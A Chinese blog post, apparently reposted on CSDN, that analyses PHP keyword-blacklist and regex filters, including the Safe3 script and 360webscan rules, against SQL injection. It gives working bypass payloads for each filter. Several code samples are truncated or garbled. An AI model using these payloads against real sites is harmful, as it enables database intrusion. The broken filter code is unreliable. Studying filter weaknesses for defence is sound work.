key php 转小写_PHP代码层防护与绕过

最新推荐文章于 2021-06-19 22:45:30 发布
最新推荐文章于 2021-06-19 22:45:30 发布
阅读量98 收藏
点赞数
文章标签: key php 转小写
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_33364627/article/details/112415137
版权

0x01 前言

  在一些网站通常会在公用文件引入全局防护代码进行SQL注入、XSS跨站脚本等漏洞的防御,在一定程度上对网站安全防护还是比较有效的。

  这里讨论一下关键字过滤不完善及常见正则匹配存在的问题,并收集了网络上常见的PHP全局防护代码进行分析。

Bypass思路:利用数据库特性或过滤函数逻辑缺陷绕过。

0x02 关键字过滤

1、使用strpos过滤关键字

PHP过滤代码如下:

<?php $str = "and|or|union|select|from|where|limit|order by|guoup by|$arr=explode("|",$str);#print_r($arr);foreach($arr as $key=>$val){$flag=strpos($_GET['id'],$val);if ($flag){    echo 'Error';    exit();}}?>

Bypass思路:strpos() 函数查找字符串在另一字符串中第一次出现的位置。strpos() 函数对大小写敏感。

大小写绕过:id=1 AND 1=1 UNION SELECT 1,2,3  FROM ADMIN

2、使用stripos,进行关键字过滤

   与strpos相比,stripos() - 查找字符串在另一字符串中第一次出现的位置(不区分大小写)

PHP过滤代码如下:

<?php $str = "and|or|union|select|from|where|limit|order by|guoup by|$arr=explode("|",$str);#print_r($arr);foreach($arr as $key=>$val){$flag=strpos($_GET['id'],$val);if ($flag){    echo 'Error';    exit();}}?>

Bypass思路:

当$flag等于0,即关键字在输入参数的第一位,可绕过

id=xsstest

关键字过滤类似的方法:

<?php $blacklist_keywords = 'select,from,1=1,--,union,#';$blacklist = explode(',',$blacklist_keywords);print_r($blacklist);foreach($blacklist as $key=>$value){    //$_REQUEST['id'] = str_replace(strtolower($value),'',strtolower($_REQUEST['id']));                   $_REQUEST['id'] = str_replace($value,'',$_REQUEST['id']);}echo $_REQUEST['id'];?>

0x03 正则匹配

1、边界关键词

\b 表示单词的边界,因此只有独立的 "union" 单词会被匹配

PHP过滤代码如下:

<?php if  (preg_match("/\b(union|select|from)\b/i",$_GET['id'])==1){     echo "Error";    exit();}echo "success" ;?>

Bypass思路:

通过数据库的特性,在关键字前后添加字符,打扰关键字边界判断

id=1e0union/*!12345select*/1,2,3,4/*!12345from*/users

2、匹配模式

i 忽略大小写,匹配不考虑大小写,默认不匹配多行

PHP过滤代码如下:

<?php if  (preg_match("/(?:(union(.*?)select))/i",$_GET['id'])==1){     echo "Error";    exit();}echo "success" ;?>

Bypass思路:

通过换行 \n可绕过,url编码为%0a

id=1 union%23%0aseleCT 1,2,3,4 from users

修复方案:

  preg_match("/(?:(union(.*?)select))/ims",$_GET['id'])

0x04 PHP通用防护代码

1、safe3 防注入代码

<?php //Code By Safe3 ini_set('date.timezone','Asia/Shanghai');function customError($errno, $errstr, $errfile, $errline){    echo "Error number: [$errno],error on line $errline in $errfile
";    die();}set_error_handler("customError",E_ERROR);$getfilter="'|select|from|(and|or)\\b.+?(>|$postfilter="\\b(and|or)\\b.{1,6}?(=|>|$cookiefilter="\\b(and|or)\\b.{1,6}?(=|>|function StopAttack($StrFiltKey,$StrFiltValue,$ArrFiltReq){    if(is_array($StrFiltValue))    {        $StrFiltValue=implode($StrFiltValue);    }    if (preg_match("/".$ArrFiltReq."/is",$StrFiltValue)==1){        slog("
操作IP: ".$_SERVER["REMOTE_ADDR"]."
操作时间: ".strftime("%Y-%m-%d %H:%M:%S")."
操作页面:".$_SERVER["PHP_SELF"]."
提交方式: ".$_SERVER["REQUEST_METHOD"]."
提交参数: ".$StrFiltKey."
提交数据: ".$StrFiltValue);        @header("http/1.1 404 not found");         print "404: Not Found";        //slog("
操作IP: ".$_SERVER["REMOTE_ADDR"]."
操作时间: ".strftime("%Y-%m-%d %H:%M:%S")."
操作页面:".$_SERVER["PHP_SELF"]."
提交方式: ".$_SERVER["REQUEST_METHOD"]."
提交参数: ".$StrFiltKey."
提交数据: ".$StrFiltValue);        print "Url里含有非法字符串,属于有误操作!... 您还可以返回首页";  ;exit();    }}//$ArrPGC=array_merge($_GET,$_POST,$_COOKIE);foreach($_GET as $key=>$value){    StopAttack($key,$value,$getfilter);}foreach($_POST as $key=>$value){    StopAttack($key,$value,$postfilter);}foreach($_COOKIE as $key=>$value){    StopAttack($key,$value,$cookiefilter);}function slog($logs){    $toppath=$_SERVER["DOCUMENT_ROOT"]."/log.htm";    $Ts=fopen($toppath,"a+");    fputs($Ts,$logs."\r\n");    fclose($Ts);}?>

如果正面怼正则,实在想不到绕过的方式。。

2、360webscan防御脚本

  360网站安全:http://webscan.360.cn

  http://webscan.360.cn/protect/index/?act=reinstall&domain=www.test.com下载漏洞修复插件360webscan.zip  多次下载解压失败,

  无奈,跑到cmseasy下载最新版cms,解压获取 webscan360/360safe目录,分享到网盘,链接: https://pan.baidu.com/s/1nviNi2l 密码: 3itq

  WEBSCAN_VERSION :0.1.3.2

4bf70908e3c8667ba7a2387e951adc61.png

SQL语句测试,成功拦截: 

a5340c13a108a9b3c7959a20e7cd4424.png

Bypass思路:

  关键的两个正则:

  UNION.+?SELECT\s*(\(.+\)\s*|@{1,2}.+?\s*|\s+?.+?|(`|'|\").*?(`|'|\")\s*)

  (SELECT|DELETE)@{0,2}(\\(.+\\)|\\s+?.+?\\s+?|(`|'|\").*?(`|'|\"))FROM(\\(.+\\)|\\s+?.+?|(`|'|\").*?(`|'|\"))

  id=1e0union select!1,user(),3,4 from users

dde946c2e2fad7cbee4441c75526920f.png

0x05 结束

    本文简单演示了几种防护代码和绕过场景,在攻与防的道路上,不只是掌握一些技巧,是与代码的对抗,更是人与人的对抗。

酱婆的美学
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
绕过360全套+云锁提权.pdf
03-06
绕过360全套+云锁提权.pdf
PHP代码审计:文件上传(大小写绕过
qq_22132931的博客
10-24 329
PHP代码审计:文件上传(大小写绕过
webscan bypass和Sql注入的笔记
weixin_43952190的博客
06-19 499
一. 360webscan bypass 绕过360webscan通防的方法 1. php_self白名单绕过 原理: $webscan_white_directory='admin|\/dede\/|\/install\/'; php_self中含有 admin或者 /dede/ 或者 /install/时,不过滤字符。 测试: 在urlpath之后添加 /admin ,/dede/ ,/install/之后不拦截 2. white_url白名单绕过 原理: $webscan_white_url =
360webscan防注入脚本全面绕过
公众号shadow sock7
06-12 6054
参考: https://www.leavesongs.com/PENETRATION/360webscan-bypass.html http://www.moonsec.com/post-687.html http://www.mayter.cn/t/6927
Webscan360的防御与绕过
zqsqrlqd的博客
03-31 1872
这两天给360做了一个webscan360的总结,结果补丁还没有出来,就被人公布到了91org上面,既然公开了,那我就做一个总结 首先我们贴上它最新的防御正则 \||\b(alert\(|confirm\(|expression\(|prompt\(|benchmark\s*?\(.*\)|sleep\s*?\(.*\)|load_file\s*?\()|]*?\bon([a-z]{4,}
php数组函数array_key_exists()小结
10-23
本文给大家汇总介绍了php数组函数array_key_exists()的相关知识以及与in_array的性能对比,与isset的区别分析,非常的详细,有需要的小伙伴可以参考下。
PHP中isset与array_key_exists的区别实例分析
10-24
主要介绍了PHP中isset与array_key_exists的区别,较为详细的分析了isset与array_key_exists使用中的区别,并实例分析其具体用法,需要的朋友可以参考下
php中array_unshift()修改数组key注意事项分析
10-22
主要介绍了php中array_unshift()修改数组key注意事项,实例分析了array_unshift()函数在处理键值为数字类型时自动换键值的情况,需要的朋友可以参考下
RSA.rar_RSA PHP_php rsa_php rsa key_rsa_rsa key
09-23
first, generate public and private key with generate.php. you will get e,d, and n. for encrypt, use the e and n for private and public key. and using d and n as private and public key to decrypt your...
PHP数组Key强制类型换实现原理解析
10-14
在日常编程中,应尽量避免依赖于这种隐式换的行为,尤其是在处理数组Key时,要确保Key的类型与预期一致,以减少可能出现的错误。通过深入学习和实践,我们可以更好地掌握PHP数组的使用,并避免潜在的陷阱。
360webscan.php_bypass.pdf
03-18
360webscan.php_bypass
绕过360简单技巧(免杀)
06-04
浴血凤凰的教程,用restorator修改版本和图标绕过360杀毒,适合免杀菜鸟看。不错哦
360webscan解决xss漏洞
05-26
解决360检查wordpress的xss漏洞问题
【Laravel3.0.0源码阅读分析】任务keykey.php
深漂小码哥
06-09 309
<?php namespace Laravel\CLI\Tasks; use Laravel\Str; use Laravel\File; class Key extends Task { /** * The path to the application config. * 应用程序配置的路径。 * @var string */ protected $path; /** * Create a new instance of the Key task. * 创建.
360导致mysql_mysql一个特性绕过webscan360导致sql完美执行
weixin_39630498的博客
01-20 296
这里我们就要说一下,最新版本的cmseasy了我们首先测试一个东西,在mysql中select tname,1,2,3,4 from table 这个东西想必大家都会认同,可以执行那么我们去掉select和tname之间的空格,看看这样的语句还能否执行这里我们用cmseasy的数据库测试一下SELECTcatid FROM cmseasy_archive WHERE 1看到了没有完美执行了在之前审...
怎么绕过PHP防护,绕过某CDN的防注入简单技巧(绕过360webscan)
weixin_42154650的博客
03-18 371
昨天几个朋友聊到了某个cms里用的360webscan脚本,问我怎么绕过。其实之前一直没有研究过正则的绕过,当然这次也不是正则的绕过,但最终目的是达到了,全面绕过了360webscan对于注入与xss的防护。使用360webscan的一大cms就是cmseasy,我们就借用cmseasy中的360webscan来说明。其中有一个白名单函数:/*** 拦截目录白名单*/function websc...
360webscan.php 使用,【漏洞练习-Day15】360webscan 使用$_SERVER['PHP_SELF']不当
weixin_39982236的博客
03-18 586
开始练习【红日团队】的PHP-Audit-Labs 代码审计 Day15链接:https://github.com/hongriSec/PHP-Audit-Labs感兴趣的同学可以去练习练习预备知识:内容题目均来自 PHP SECURITY CALENDAR 2017Day 15 - Sleigh Ride代码如下:class Redirect {private $websiteHost = 'w...
PHP代码防护绕过
10-24 385
0x01 前言   在一些网站通常会在公用文件引入全局防护代码进行SQL注入、XSS跨站脚本等漏洞的防御,在一定程度上对网站安全防护还是比较有效的。   这里讨论一下关键字过滤不完善及常见正则匹配存在的问题,并收集了网络上常见的PHP全局防护代码进行分析。   Bypass思路:只考虑关键字被过滤如何进行Bypass的问题,暂不考虑关键字替换绕过的情况。 0x02 关键字过滤 ...
mysql绕过360_360webscan 防注入绕过(HPF)
weixin_32258691的博客
02-08 1097
生活总是需要一点新的色彩,最近看Mysql基于数据类型溢出的报错注入,又重新燃起了我以前对SQLi的激情。感觉自己还是很喜欢这个东西的。发现凡是 能和“绕过”有关系的(想了想,还真不包括那些硬件DEP ASLR啥的哈,脑子不够用 那个真爱不起)东西我都很喜欢,而且欲罢不能。所以找回来了之前绕过360webscan时的那个文件,看看防注入是否也能绕过(当然,这个已经被@phith0n利用$_SERV...
php array_diff_key
最新发布
09-09
`array_diff_key` 是一个 PHP 函数,用于比较两个或多个数组的键名,并返回在第一个数组中存在但在其他数组中不存在的键名。 函数语法如下: ```php array_diff_key(array1, array2, array3, ...) ``` 其中,`array1` 是被比较的数组,`array2`、`array3` 等是用来进行比较的其他数组。 示例代码: ```php $array1 = array("a" => 1, "b" => 2, "c" => 3); $array2 = array("a" => 1, "b" => 2); $array3 = array("b" => 2, "c" => 3); $result = array_diff_key($array1, $array2, $array3); print_r($result); ``` 输出结果: ``` Array ( [a] => 1 ) ``` 在上述示例中,`$array1` 是被比较的数组,`$array2` 和 `$array3` 是用来进行比较的其他数组。`array_diff_key` 函数返回了在 `$array1` 中存在但在 `$array2` 和 `$array3` 中不存在的键名,即 `a`。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值